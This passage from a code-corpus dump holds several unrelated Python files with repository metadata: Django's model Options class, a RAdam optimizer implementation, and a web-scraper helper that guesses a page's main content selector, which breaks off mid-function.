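#   with open("branch_trace.txt") as f:  # hypothetical trace file
#       hits = sum(Aux11(0, a, line, Xhistoria, BHT, PHT) for line in f)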
|
[
"noreply@github.com"
] |
Marlon-Lazo-Coronado.noreply@github.com
|
1d7defe0dd95cb7c5299a83beefa61777183b3fd
|
ed0f9eb0c1cb4858d91ef7e2d435db307f23a5a5
|
/dist/manage/django/db/models/options.py
|
ee34b3d807cd1788fca322da2dd5e8a8cc2481bf
|
[] |
no_license
|
hjlhehehe123/ATC_Data
|
81b4622e7279aa9cc2013db8cc5a71d33561e768
|
ad35e61afb8e87d8bab2d2b3aeea08e9409d56c0
|
refs/heads/master
| 2023-07-13T16:23:45.951584
| 2021-08-20T12:37:34
| 2021-08-20T12:37:34
| 256,994,694
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 35,502
|
py
|
import bisect
import copy
import inspect
from collections import defaultdict
from django.apps import apps
from django.conf import settings
from django.core.exceptions import FieldDoesNotExist
from django.db import connections
from django.db.models import AutoField, Manager, OrderWrt, UniqueConstraint
from django.db.models.query_utils import PathInfo
from django.utils.datastructures import ImmutableList, OrderedSet
from django.utils.functional import cached_property
from django.utils.text import camel_case_to_spaces, format_lazy
from django.utils.translation import override
PROXY_PARENTS = object()
EMPTY_RELATION_TREE = ()
IMMUTABLE_WARNING = (
"The return type of '%s' should never be mutated. If you want to manipulate this list "
"for your own use, make a copy first."
)
DEFAULT_NAMES = (
'verbose_name', 'verbose_name_plural', 'db_table', 'ordering',
'unique_together', 'permissions', 'get_latest_by', 'order_with_respect_to',
'app_label', 'db_tablespace', 'abstract', 'managed', 'proxy', 'swappable',
'auto_created', 'index_together', 'apps', 'default_permissions',
'select_on_save', 'default_related_name', 'required_db_features',
'required_db_vendor', 'base_manager_name', 'default_manager_name',
'indexes', 'constraints',
)
def normalize_together(option_together):
"""
option_together can be either a tuple of tuples, or a single
tuple of two strings. Normalize it to a tuple of tuples, so that
calling code can uniformly expect that.
"""
try:
if not option_together:
return ()
if not isinstance(option_together, (tuple, list)):
raise TypeError
first_element = option_together[0]
if not isinstance(first_element, (tuple, list)):
option_together = (option_together,)
# Normalize everything to tuples
return tuple(tuple(ot) for ot in option_together)
except TypeError:
# If the value of option_together isn't valid, return it
# verbatim; this will be picked up by the check framework later.
return option_together
def make_immutable_fields_list(name, data):
return ImmutableList(data, warning=IMMUTABLE_WARNING % name)
class Options:
FORWARD_PROPERTIES = {
'fields', 'many_to_many', 'concrete_fields', 'local_concrete_fields',
'_forward_fields_map', 'managers', 'managers_map', 'base_manager',
'default_manager',
}
REVERSE_PROPERTIES = {'related_objects', 'fields_map', '_relation_tree'}
default_apps = apps
def __init__(self, meta, app_label=None):
self._get_fields_cache = {}
self.local_fields = []
self.local_many_to_many = []
self.private_fields = []
self.local_managers = []
self.base_manager_name = None
self.default_manager_name = None
self.model_name = None
self.verbose_name = None
self.verbose_name_plural = None
self.db_table = ''
self.ordering = []
self._ordering_clash = False
self.indexes = []
self.constraints = []
self.unique_together = []
self.index_together = []
self.select_on_save = False
self.default_permissions = ('add', 'change', 'delete', 'view')
self.permissions = []
self.object_name = None
self.app_label = app_label
self.get_latest_by = None
self.order_with_respect_to = None
self.db_tablespace = settings.DEFAULT_TABLESPACE
self.required_db_features = []
self.required_db_vendor = None
self.meta = meta
self.pk = None
self.auto_field = None
self.abstract = False
self.managed = True
self.proxy = False
# For any class that is a proxy (including automatically created
# classes for deferred object loading), proxy_for_model tells us
# which class this model is proxying. Note that proxy_for_model
# can create a chain of proxy models. For non-proxy models, the
# variable is always None.
self.proxy_for_model = None
# For any non-abstract class, the concrete class is the model
# in the end of the proxy_for_model chain. In particular, for
# concrete models, the concrete_model is always the class itself.
self.concrete_model = None
self.swappable = None
self.parents = {}
self.auto_created = False
# List of all lookups defined in ForeignKey 'limit_choices_to' options
# from *other* models. Needed for some admin checks. Internal use only.
self.related_fkey_lookups = []
# A custom app registry to use, if you're making a separate model set.
self.apps = self.default_apps
self.default_related_name = None
@property
def label(self):
return '%s.%s' % (self.app_label, self.object_name)
@property
def label_lower(self):
return '%s.%s' % (self.app_label, self.model_name)
@property
def app_config(self):
# Don't go through get_app_config to avoid triggering imports.
return self.apps.app_configs.get(self.app_label)
@property
def installed(self):
return self.app_config is not None
def contribute_to_class(self, cls, name):
from django.db import connection
from django.db.backends.utils import truncate_name
cls._meta = self
self.model = cls
# First, construct the default values for these options.
self.object_name = cls.__name__
self.model_name = self.object_name.lower()
self.verbose_name = camel_case_to_spaces(self.object_name)
# Store the original user-defined values for each option,
# for use when serializing the model definition
self.original_attrs = {}
# Next, apply any overridden values from 'class Meta'.
if self.meta:
meta_attrs = self.meta.__dict__.copy()
for name in self.meta.__dict__:
# Ignore any private attributes that Django doesn't care about.
# NOTE: We can't modify a dictionary's contents while looping
# over it, so we loop over the *original* dictionary instead.
if name.startswith('_'):
del meta_attrs[name]
for attr_name in DEFAULT_NAMES:
if attr_name in meta_attrs:
setattr(self, attr_name, meta_attrs.pop(attr_name))
self.original_attrs[attr_name] = getattr(self, attr_name)
elif hasattr(self.meta, attr_name):
setattr(self, attr_name, getattr(self.meta, attr_name))
self.original_attrs[attr_name] = getattr(self, attr_name)
self.unique_together = normalize_together(self.unique_together)
self.index_together = normalize_together(self.index_together)
# App label/class name interpolation for names of constraints and
# indexes.
if not getattr(cls._meta, 'abstract', False):
for attr_name in {'constraints', 'indexes'}:
objs = getattr(self, attr_name, [])
setattr(self, attr_name, self._format_names_with_class(cls, objs))
# verbose_name_plural is a special case because it uses a 's'
# by default.
if self.verbose_name_plural is None:
self.verbose_name_plural = format_lazy('{}s', self.verbose_name)
            # order_with_respect_to and ordering are mutually exclusive.
self._ordering_clash = bool(self.ordering and self.order_with_respect_to)
# Any leftover attributes must be invalid.
if meta_attrs != {}:
raise TypeError("'class Meta' got invalid attribute(s): %s" % ','.join(meta_attrs))
else:
self.verbose_name_plural = format_lazy('{}s', self.verbose_name)
del self.meta
# If the db_table wasn't provided, use the app_label + model_name.
if not self.db_table:
self.db_table = "%s_%s" % (self.app_label, self.model_name)
self.db_table = truncate_name(self.db_table, connection.ops.max_name_length())
def _format_names_with_class(self, cls, objs):
"""App label/class name interpolation for object names."""
new_objs = []
for obj in objs:
obj = obj.clone()
obj.name = obj.name % {
'app_label': cls._meta.app_label.lower(),
'class': cls.__name__.lower(),
}
new_objs.append(obj)
return new_objs
def _prepare(self, model):
if self.order_with_respect_to:
# The app registry will not be ready at this point, so we cannot
# use get_field().
query = self.order_with_respect_to
try:
self.order_with_respect_to = next(
f for f in self._get_fields(reverse=False)
if f.name == query or f.attname == query
)
except StopIteration:
raise FieldDoesNotExist("%s has no field named '%s'" % (self.object_name, query))
self.ordering = ('_order',)
if not any(isinstance(field, OrderWrt) for field in model._meta.local_fields):
model.add_to_class('_order', OrderWrt())
else:
self.order_with_respect_to = None
if self.pk is None:
if self.parents:
# Promote the first parent link in lieu of adding yet another
# field.
field = next(iter(self.parents.values()))
# Look for a local field with the same name as the
# first parent link. If a local field has already been
# created, use it instead of promoting the parent
already_created = [fld for fld in self.local_fields if fld.name == field.name]
if already_created:
field = already_created[0]
field.primary_key = True
self.setup_pk(field)
else:
auto = AutoField(verbose_name='ID', primary_key=True, auto_created=True)
model.add_to_class('id', auto)
def add_manager(self, manager):
self.local_managers.append(manager)
self._expire_cache()
def add_field(self, field, private=False):
# Insert the given field in the order in which it was created, using
# the "creation_counter" attribute of the field.
# Move many-to-many related fields from self.fields into
# self.many_to_many.
if private:
self.private_fields.append(field)
elif field.is_relation and field.many_to_many:
bisect.insort(self.local_many_to_many, field)
else:
bisect.insort(self.local_fields, field)
self.setup_pk(field)
# If the field being added is a relation to another known field,
# expire the cache on this field and the forward cache on the field
# being referenced, because there will be new relationships in the
# cache. Otherwise, expire the cache of references *to* this field.
# The mechanism for getting at the related model is slightly odd -
# ideally, we'd just ask for field.related_model. However, related_model
# is a cached property, and all the models haven't been loaded yet, so
# we need to make sure we don't cache a string reference.
if field.is_relation and hasattr(field.remote_field, 'model') and field.remote_field.model:
try:
field.remote_field.model._meta._expire_cache(forward=False)
except AttributeError:
pass
self._expire_cache()
else:
self._expire_cache(reverse=False)
def setup_pk(self, field):
if not self.pk and field.primary_key:
self.pk = field
field.serialize = False
def setup_proxy(self, target):
"""
Do the internal setup so that the current model is a proxy for
"target".
"""
self.pk = target._meta.pk
self.proxy_for_model = target
self.db_table = target._meta.db_table
def __repr__(self):
return '<Options for %s>' % self.object_name
def __str__(self):
return self.label_lower
def can_migrate(self, connection):
"""
Return True if the model can/should be migrated on the `connection`.
`connection` can be either a real connection or a connection alias.
"""
if self.proxy or self.swapped or not self.managed:
return False
if isinstance(connection, str):
connection = connections[connection]
if self.required_db_vendor:
return self.required_db_vendor == connection.vendor
if self.required_db_features:
return all(getattr(connection.features, feat, False)
for feat in self.required_db_features)
return True
@property
def verbose_name_raw(self):
"""Return the untranslated verbose name."""
with override(None):
return str(self.verbose_name)
@property
def swapped(self):
"""
Has this model been swapped out for another? If so, return the model
name of the replacement; otherwise, return None.
For historical reasons, model name lookups using get_model() are
case insensitive, so we make sure we are case insensitive here.
"""
if self.swappable:
swapped_for = getattr(settings, self.swappable, None)
if swapped_for:
try:
swapped_label, swapped_object = swapped_for.split('.')
except ValueError:
# setting not in the format app_label.model_name
# raising ImproperlyConfigured here causes problems with
# test cleanup code - instead it is raised in get_user_model
# or as part of validation.
return swapped_for
if '%s.%s' % (swapped_label, swapped_object.lower()) != self.label_lower:
return swapped_for
return None
@cached_property
def managers(self):
managers = []
seen_managers = set()
bases = (b for b in self.model.mro() if hasattr(b, '_meta'))
for depth, base in enumerate(bases):
for manager in base._meta.local_managers:
if manager.name in seen_managers:
continue
manager = copy.copy(manager)
manager.model = self.model
seen_managers.add(manager.name)
managers.append((depth, manager.creation_counter, manager))
return make_immutable_fields_list(
"managers",
(m[2] for m in sorted(managers)),
)
@cached_property
def managers_map(self):
return {manager.name: manager for manager in self.managers}
@cached_property
def base_manager(self):
base_manager_name = self.base_manager_name
if not base_manager_name:
# Get the first parent's base_manager_name if there's one.
for parent in self.model.mro()[1:]:
if hasattr(parent, '_meta'):
if parent._base_manager.name != '_base_manager':
base_manager_name = parent._base_manager.name
break
if base_manager_name:
try:
return self.managers_map[base_manager_name]
except KeyError:
raise ValueError(
"%s has no manager named %r" % (
self.object_name,
base_manager_name,
)
)
manager = Manager()
manager.name = '_base_manager'
manager.model = self.model
manager.auto_created = True
return manager
@cached_property
def default_manager(self):
default_manager_name = self.default_manager_name
if not default_manager_name and not self.local_managers:
# Get the first parent's default_manager_name if there's one.
for parent in self.model.mro()[1:]:
if hasattr(parent, '_meta'):
default_manager_name = parent._meta.default_manager_name
break
if default_manager_name:
try:
return self.managers_map[default_manager_name]
except KeyError:
raise ValueError(
"%s has no manager named %r" % (
self.object_name,
default_manager_name,
)
)
if self.managers:
return self.managers[0]
@cached_property
def fields(self):
"""
Return a list of all forward fields on the model and its parents,
excluding ManyToManyFields.
Private API intended only to be used by Django itself; get_fields()
combined with filtering of field properties is the public API for
obtaining this field list.
"""
# For legacy reasons, the fields property should only contain forward
# fields that are not private or with a m2m cardinality. Therefore we
# pass these three filters as filters to the generator.
        # The third filter is a longwinded way of checking f.related_model - we don't
# use that property directly because related_model is a cached property,
# and all the models may not have been loaded yet; we don't want to cache
# the string reference to the related_model.
def is_not_an_m2m_field(f):
return not (f.is_relation and f.many_to_many)
def is_not_a_generic_relation(f):
return not (f.is_relation and f.one_to_many)
def is_not_a_generic_foreign_key(f):
return not (
f.is_relation and f.many_to_one and not (hasattr(f.remote_field, 'model') and f.remote_field.model)
)
return make_immutable_fields_list(
"fields",
(f for f in self._get_fields(reverse=False)
if is_not_an_m2m_field(f) and is_not_a_generic_relation(f) and is_not_a_generic_foreign_key(f))
)
@cached_property
def concrete_fields(self):
"""
Return a list of all concrete fields on the model and its parents.
Private API intended only to be used by Django itself; get_fields()
combined with filtering of field properties is the public API for
obtaining this field list.
"""
return make_immutable_fields_list(
"concrete_fields", (f for f in self.fields if f.concrete)
)
@cached_property
def local_concrete_fields(self):
"""
Return a list of all concrete fields on the model.
Private API intended only to be used by Django itself; get_fields()
combined with filtering of field properties is the public API for
obtaining this field list.
"""
return make_immutable_fields_list(
"local_concrete_fields", (f for f in self.local_fields if f.concrete)
)
@cached_property
def many_to_many(self):
"""
Return a list of all many to many fields on the model and its parents.
Private API intended only to be used by Django itself; get_fields()
combined with filtering of field properties is the public API for
obtaining this list.
"""
return make_immutable_fields_list(
"many_to_many",
(f for f in self._get_fields(reverse=False) if f.is_relation and f.many_to_many)
)
@cached_property
def related_objects(self):
"""
Return all related objects pointing to the current model. The related
objects can come from a one-to-one, one-to-many, or many-to-many field
relation type.
Private API intended only to be used by Django itself; get_fields()
combined with filtering of field properties is the public API for
obtaining this field list.
"""
all_related_fields = self._get_fields(forward=False, reverse=True, include_hidden=True)
return make_immutable_fields_list(
"related_objects",
(obj for obj in all_related_fields if not obj.hidden or obj.field.many_to_many)
)
@cached_property
def _forward_fields_map(self):
res = {}
fields = self._get_fields(reverse=False)
for field in fields:
res[field.name] = field
# Due to the way Django's internals work, get_field() should also
# be able to fetch a field by attname. In the case of a concrete
# field with relation, includes the *_id name too
try:
res[field.attname] = field
except AttributeError:
pass
return res
@cached_property
def fields_map(self):
res = {}
fields = self._get_fields(forward=False, include_hidden=True)
for field in fields:
res[field.name] = field
# Due to the way Django's internals work, get_field() should also
# be able to fetch a field by attname. In the case of a concrete
# field with relation, includes the *_id name too
try:
res[field.attname] = field
except AttributeError:
pass
return res
def get_field(self, field_name):
"""
Return a field instance given the name of a forward or reverse field.
"""
try:
# In order to avoid premature loading of the relation tree
# (expensive) we prefer checking if the field is a forward field.
return self._forward_fields_map[field_name]
except KeyError:
# If the app registry is not ready, reverse fields are
# unavailable, therefore we throw a FieldDoesNotExist exception.
if not self.apps.models_ready:
raise FieldDoesNotExist(
"%s has no field named '%s'. The app cache isn't ready yet, "
"so if this is an auto-created related field, it won't "
"be available yet." % (self.object_name, field_name)
)
try:
# Retrieve field instance by name from cached or just-computed
# field map.
return self.fields_map[field_name]
except KeyError:
raise FieldDoesNotExist("%s has no field named '%s'" % (self.object_name, field_name))
def get_base_chain(self, model):
"""
Return a list of parent classes leading to `model` (ordered from
closest to most distant ancestor). This has to handle the case where
`model` is a grandparent or even more distant relation.
"""
if not self.parents:
return []
if model in self.parents:
return [model]
for parent in self.parents:
res = parent._meta.get_base_chain(model)
if res:
res.insert(0, parent)
return res
return []
def get_parent_list(self):
"""
Return all the ancestors of this model as a list ordered by MRO.
Useful for determining if something is an ancestor, regardless of lineage.
"""
result = OrderedSet(self.parents)
for parent in self.parents:
for ancestor in parent._meta.get_parent_list():
result.add(ancestor)
return list(result)
def get_ancestor_link(self, ancestor):
"""
Return the field on the current model which points to the given
"ancestor". This is possible an indirect link (a pointer to a parent
model, which points, eventually, to the ancestor). Used when
constructing table joins for model inheritance.
Return None if the model isn't an ancestor of this one.
"""
if ancestor in self.parents:
return self.parents[ancestor]
for parent in self.parents:
# Tries to get a link field from the immediate parent
parent_link = parent._meta.get_ancestor_link(ancestor)
if parent_link:
                # In the case of a proxy model, the first link in the
                # chain to the ancestor is that parent link itself
return self.parents[parent] or parent_link
def get_path_to_parent(self, parent):
"""
Return a list of PathInfos containing the path from the current
model to the parent model, or an empty list if parent is not a
parent of the current model.
"""
if self.model is parent:
return []
# Skip the chain of proxy to the concrete proxied model.
proxied_model = self.concrete_model
path = []
opts = self
for int_model in self.get_base_chain(parent):
if int_model is proxied_model:
opts = int_model._meta
else:
final_field = opts.parents[int_model]
targets = (final_field.remote_field.get_related_field(),)
opts = int_model._meta
path.append(PathInfo(
from_opts=final_field.model._meta,
to_opts=opts,
target_fields=targets,
join_field=final_field,
m2m=False,
direct=True,
filtered_relation=None,
))
return path
def get_path_from_parent(self, parent):
"""
Return a list of PathInfos containing the path from the parent
model to the current model, or an empty list if parent is not a
parent of the current model.
"""
if self.model is parent:
return []
model = self.concrete_model
# Get a reversed base chain including both the current and parent
# models.
chain = model._meta.get_base_chain(parent)
chain.reverse()
chain.append(model)
# Construct a list of the PathInfos between models in chain.
path = []
for i, ancestor in enumerate(chain[:-1]):
child = chain[i + 1]
link = child._meta.get_ancestor_link(ancestor)
path.extend(link.get_reverse_path_info())
return path
def _populate_directed_relation_graph(self):
"""
This method is used by each model to find its reverse objects. As this
method is very expensive and is accessed frequently (it looks up every
field in a model, in every app), it is computed on first access and then
is set as a property on every model.
"""
related_objects_graph = defaultdict(list)
all_models = self.apps.get_models(include_auto_created=True)
for model in all_models:
opts = model._meta
# Abstract model's fields are copied to child models, hence we will
# see the fields from the child models.
if opts.abstract:
continue
fields_with_relations = (
f for f in opts._get_fields(reverse=False, include_parents=False)
if f.is_relation and f.related_model is not None
)
for f in fields_with_relations:
if not isinstance(f.remote_field.model, str):
remote_label = f.remote_field.model._meta.concrete_model._meta.label
related_objects_graph[remote_label].append(f)
for model in all_models:
# Set the relation_tree using the internal __dict__. In this way
# we avoid calling the cached property. In attribute lookup,
# __dict__ takes precedence over a data descriptor (such as
# @cached_property). This means that the _meta._relation_tree is
# only called if related_objects is not in __dict__.
related_objects = related_objects_graph[model._meta.concrete_model._meta.label]
model._meta.__dict__['_relation_tree'] = related_objects
# It seems it is possible that self is not in all_models, so guard
# against that with default for get().
return self.__dict__.get('_relation_tree', EMPTY_RELATION_TREE)
@cached_property
def _relation_tree(self):
return self._populate_directed_relation_graph()
def _expire_cache(self, forward=True, reverse=True):
# This method is usually called by apps.cache_clear(), when the
# registry is finalized, or when a new field is added.
if forward:
for cache_key in self.FORWARD_PROPERTIES:
if cache_key in self.__dict__:
delattr(self, cache_key)
if reverse and not self.abstract:
for cache_key in self.REVERSE_PROPERTIES:
if cache_key in self.__dict__:
delattr(self, cache_key)
self._get_fields_cache = {}
def get_fields(self, include_parents=True, include_hidden=False):
"""
        Return a list of fields associated with the model. By default, include
forward and reverse fields, fields derived from inheritance, but not
hidden fields. The returned fields can be changed using the parameters:
- include_parents: include fields derived from inheritance
- include_hidden: include fields that have a related_name that
starts with a "+"
"""
if include_parents is False:
include_parents = PROXY_PARENTS
return self._get_fields(include_parents=include_parents, include_hidden=include_hidden)
def _get_fields(self, forward=True, reverse=True, include_parents=True, include_hidden=False,
seen_models=None):
"""
Internal helper function to return fields of the model.
* If forward=True, then fields defined on this model are returned.
* If reverse=True, then relations pointing to this model are returned.
* If include_hidden=True, then fields with is_hidden=True are returned.
* The include_parents argument toggles if fields from parent models
should be included. It has three values: True, False, and
PROXY_PARENTS. When set to PROXY_PARENTS, the call will return all
fields defined for the current model or any of its parents in the
parent chain to the model's concrete model.
"""
if include_parents not in (True, False, PROXY_PARENTS):
raise TypeError("Invalid argument for include_parents: %s" % (include_parents,))
# This helper function is used to allow recursion in ``get_fields()``
# implementation and to provide a fast way for Django's internals to
# access specific subsets of fields.
# We must keep track of which models we have already seen. Otherwise we
# could include the same field multiple times from different models.
topmost_call = seen_models is None
if topmost_call:
seen_models = set()
seen_models.add(self.model)
# Creates a cache key composed of all arguments
cache_key = (forward, reverse, include_parents, include_hidden, topmost_call)
try:
# In order to avoid list manipulation. Always return a shallow copy
# of the results.
return self._get_fields_cache[cache_key]
except KeyError:
pass
fields = []
# Recursively call _get_fields() on each parent, with the same
# options provided in this call.
if include_parents is not False:
for parent in self.parents:
# In diamond inheritance it is possible that we see the same
# model from two different routes. In that case, avoid adding
# fields from the same parent again.
if parent in seen_models:
continue
if (parent._meta.concrete_model != self.concrete_model and
include_parents == PROXY_PARENTS):
continue
for obj in parent._meta._get_fields(
forward=forward, reverse=reverse, include_parents=include_parents,
include_hidden=include_hidden, seen_models=seen_models):
if not getattr(obj, 'parent_link', False) or obj.model == self.concrete_model:
fields.append(obj)
if reverse and not self.proxy:
# Tree is computed once and cached until the app cache is expired.
# It is composed of a list of fields pointing to the current model
# from other models.
all_fields = self._relation_tree
for field in all_fields:
# If hidden fields should be included or the relation is not
# intentionally hidden, add to the fields dict.
if include_hidden or not field.remote_field.hidden:
fields.append(field.remote_field)
if forward:
fields += self.local_fields
fields += self.local_many_to_many
# Private fields are recopied to each child model, and they get a
# different model as field.model in each child. Hence we have to
# add the private fields separately from the topmost call. If we
# did this recursively similar to local_fields, we would get field
# instances with field.model != self.model.
if topmost_call:
fields += self.private_fields
# In order to avoid list manipulation. Always
# return a shallow copy of the results
fields = make_immutable_fields_list("get_fields()", fields)
# Store result into cache for later access
self._get_fields_cache[cache_key] = fields
return fields
@cached_property
def total_unique_constraints(self):
"""
Return a list of total unique constraints. Useful for determining set
of fields guaranteed to be unique for all rows.
"""
return [
constraint
for constraint in self.constraints
if isinstance(constraint, UniqueConstraint) and constraint.condition is None
]
@cached_property
def _property_names(self):
"""Return a set of the names of the properties defined on the model."""
names = []
for name in dir(self.model):
attr = inspect.getattr_static(self.model, name)
if isinstance(attr, property):
names.append(name)
return frozenset(names)
@cached_property
def db_returning_fields(self):
"""
Private API intended only to be used by Django itself.
Fields to be returned after a database insert.
"""
return [
field for field in self._get_fields(forward=True, reverse=False, include_parents=PROXY_PARENTS)
if getattr(field, 'db_returning', False)
]
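# A hedged illustration of `normalize_together` (standalone, verifiable against
# the function body above): the single-tuple form is wrapped so callers always
# see a tuple of tuples, and falsy input collapses to an empty tuple.
#
#   assert normalize_together(('a', 'b')) == (('a', 'b'),)
#   assert normalize_together([('a', 'b'), ('c', 'd')]) == (('a', 'b'), ('c', 'd'))
#   assert normalize_together(None) == ()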
|
[
"1598214715@qq.com"
] |
1598214715@qq.com
|
86bd8f488e2a3f03cf11a16bb713fdcc449751ff
|
17d7ea5dcde978f054a302c039cf6d8c0f91dc89
|
/pegc/training/radam.py
|
9318174fa184699d360430631db2b528b449392c
|
[] |
no_license
|
mmikolajczak/put_emg_gestures_classification
|
194bfa0843a02f8f8058d1d5584556fc8d8aa221
|
d5b2cbe9e257f9e53e3c6d7563b9141178142e18
|
refs/heads/master
| 2021-01-05T20:04:05.552628
| 2020-02-11T18:10:25
| 2020-02-11T18:10:25
| 241,123,872
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,423
|
py
|
# Implemenatation taken from the original authors: https://github.com/LiyuanLucasLiu/RAdam
import math
import torch
from torch.optim.optimizer import Optimizer
class RAdam(Optimizer):
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, weight_decay=0, degenerated_to_sgd=True):
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
self.degenerated_to_sgd = degenerated_to_sgd
if isinstance(params, (list, tuple)) and len(params) > 0 and isinstance(params[0], dict):
for param in params:
if 'betas' in param and (param['betas'][0] != betas[0] or param['betas'][1] != betas[1]):
param['buffer'] = [[None, None, None] for _ in range(10)]
defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay,
buffer=[[None, None, None] for _ in range(10)])
super(RAdam, self).__init__(params, defaults)
def __setstate__(self, state):
super(RAdam, self).__setstate__(state)
def step(self, closure=None):
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data.float()
if grad.is_sparse:
raise RuntimeError('RAdam does not support sparse gradients')
p_data_fp32 = p.data.float()
state = self.state[p]
if len(state) == 0:
state['step'] = 0
state['exp_avg'] = torch.zeros_like(p_data_fp32)
state['exp_avg_sq'] = torch.zeros_like(p_data_fp32)
else:
state['exp_avg'] = state['exp_avg'].type_as(p_data_fp32)
state['exp_avg_sq'] = state['exp_avg_sq'].type_as(p_data_fp32)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
beta1, beta2 = group['betas']
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
exp_avg.mul_(beta1).add_(1 - beta1, grad)
state['step'] += 1
buffered = group['buffer'][int(state['step'] % 10)]
if state['step'] == buffered[0]:
N_sma, step_size = buffered[1], buffered[2]
else:
buffered[0] = state['step']
beta2_t = beta2 ** state['step']
N_sma_max = 2 / (1 - beta2) - 1
N_sma = N_sma_max - 2 * state['step'] * beta2_t / (1 - beta2_t)
buffered[1] = N_sma
# more conservative since it's an approximated value
if N_sma >= 5:
step_size = math.sqrt(
(1 - beta2_t) * (N_sma - 4) / (N_sma_max - 4) * (N_sma - 2) / N_sma * N_sma_max / (
N_sma_max - 2)) / (1 - beta1 ** state['step'])
elif self.degenerated_to_sgd:
step_size = 1.0 / (1 - beta1 ** state['step'])
else:
step_size = -1
buffered[2] = step_size
# more conservative since it's an approximated value
if N_sma >= 5:
if group['weight_decay'] != 0:
p_data_fp32.add_(-group['weight_decay'] * group['lr'], p_data_fp32)
denom = exp_avg_sq.sqrt().add_(group['eps'])
p_data_fp32.addcdiv_(-step_size * group['lr'], exp_avg, denom)
p.data.copy_(p_data_fp32)
elif step_size > 0:
if group['weight_decay'] != 0:
p_data_fp32.add_(-group['weight_decay'] * group['lr'], p_data_fp32)
p_data_fp32.add_(-step_size * group['lr'], exp_avg)
p.data.copy_(p_data_fp32)
return loss
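# --- Added usage sketch (not part of the original file): RAdam drops in where
# torch.optim.Adam would go; the model and data below are illustrative
# assumptions (step() uses pre-1.5 in-place signatures, so an older PyTorch).
if __name__ == '__main__':
    model = torch.nn.Linear(10, 1)
    optimizer = RAdam(model.parameters(), lr=1e-3)
    inputs, targets = torch.randn(32, 10), torch.randn(32, 1)
    for _ in range(5):
        optimizer.zero_grad()
        loss = torch.nn.functional.mse_loss(model(inputs), targets)
        loss.backward()
        optimizer.step()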
|
[
"mkm0796@gmail.com"
] |
mkm0796@gmail.com
|
60fcfc378d54ccd133e08ab358d958783eac490c
|
ca300a047dd22f16fb621997207cc62ec6b94481
|
/deployer/src/html_helper.py
|
d313af51965137e7c08954ae699d5b0cf0f17780
|
[
"MIT"
] |
permissive
|
j-low/docsearch-scraper
|
69bc3142c1a514c5007d1d24903a3ef18eaf35fc
|
95e3dbc10913e4f8d9a2e57c55be0df5055b9955
|
refs/heads/master
| 2022-12-09T21:05:19.771253
| 2018-02-11T22:48:36
| 2018-02-11T22:48:36
| 122,222,503
| 0
| 0
|
NOASSERTION
| 2022-12-08T00:40:18
| 2018-02-20T16:15:38
|
Python
|
UTF-8
|
Python
| false
| false
| 4,648
|
py
|
def get_dom_from_content(content):
from lxml import html
page = html.fromstring(content)
return page
def get_content_from_url(url):
from selenium import webdriver
import time
profile = webdriver.FirefoxProfile()
profile.set_preference('network.http.accept-encoding.secure', 'gzip, deflate')
driver = webdriver.Firefox(profile)
driver.implicitly_wait(1)
driver.get(url)
time.sleep(1)
content = driver.page_source.encode('utf-8')
driver.quit()
return content
def get_possible_main_container(url):
content = get_content_from_url(url)
page = get_dom_from_content(content)
ps = page.xpath("//p")
possible_main_container = []
for p in ps:
elt = p
elt = elt.getparent()
i = 0
while elt is not None:
if elt.tag != 'html' and (elt.tag != 'body' or i == 0):
possible_main_container.append(elt)
i +=1
elt = elt.getparent()
return set(possible_main_container)
def get_depth(div):
depth = 0
elt = div
while elt is not None:
elt = elt.getparent()
depth += 1
return depth - 1
def get_selectors(div):
id = div.get('id', None)
classes = div.get('class', None)
if div.tag in ['main', 'article', 'section']:
return div.tag
if classes is not None:
return ['.' + e.strip() for e in classes.split(' ')]
if id is not None:
return "#" + id
if div.tag != 'div':
return div.tag
return None
def get_p_count(div):
return len(div.findall('.//p'))
def get_selector_count(div):
return 0
def sort_selectors(a, b):
if a["p_count"] > b["p_count"]:
return -1
if a["p_count"] < b["p_count"]:
return 1
if a["depth"] > b["depth"]:
return -1
if a["depth"] < b["depth"]:
return 1
if isinstance(a["selector"], list) and not isinstance(b["selector"], list):
return -1
return 1
def get_eligible_divs(url):
possible_main_container = get_possible_main_container(url)
eligible_divs = []
for div in possible_main_container:
eligible_divs.append({
"depth": get_depth(div),
"selector": get_selectors(div),
"selector_count": get_selector_count(div),
"p_count": get_p_count(div),
})
#print get_selectors(div), get_p_count(div), get_depth(div)
eligible_divs = [elt for elt in eligible_divs if elt['selector'] is not None]
eligible_divs.sort(sort_selectors)
return eligible_divs
def get_main_selector_for_url(url):
eligible_divs = get_eligible_divs(url)
best_div = eligible_divs[0] if len(eligible_divs) > 0 else None
main_selector = None
if best_div is not None:
main_selector = best_div['selector']
if isinstance(main_selector, list):
if len(main_selector) == 1:
main_selector = main_selector[0]
else:
i = 1
print("Choose main selector")
for selector in main_selector:
print(str(i) + ") " + selector)
i += 1
choice = 1
try:
choice = int(raw_input(""))
if choice < 1 or choice > len(main_selector):
choice = 1
except ValueError:
pass
main_selector = main_selector[choice - 1]
return main_selector
def get_links(url, body):
from scrapy.http import HtmlResponse
from scrapy.linkextractors.lxmlhtml import LxmlLinkExtractor
start_url = url
if '.html' in start_url:
start_url = start_url.rsplit('/', 1)[0]
response = HtmlResponse(
url=start_url,
body=body,
encoding='utf8'
)
link_extractor = LxmlLinkExtractor(
allow=[start_url],
deny=[],
tags='a',
attrs='href',
canonicalize=True
)
return link_extractor.extract_links(response)
def get_main_selector(url):
return "FIXME"
import random
from collections import Counter
content = get_content_from_url(url)
links = [link.url for link in get_links(url, content) if link.url != url and link.url + '/' != url]
if len(links) >= 3:
random.shuffle(links)
n = min(6, max(len(links), 3))
selectors = [get_main_selector_for_url(link) for link in links[:n]]
count = Counter(selectors)
selector = count.most_common()[0][0]
return selector
else:
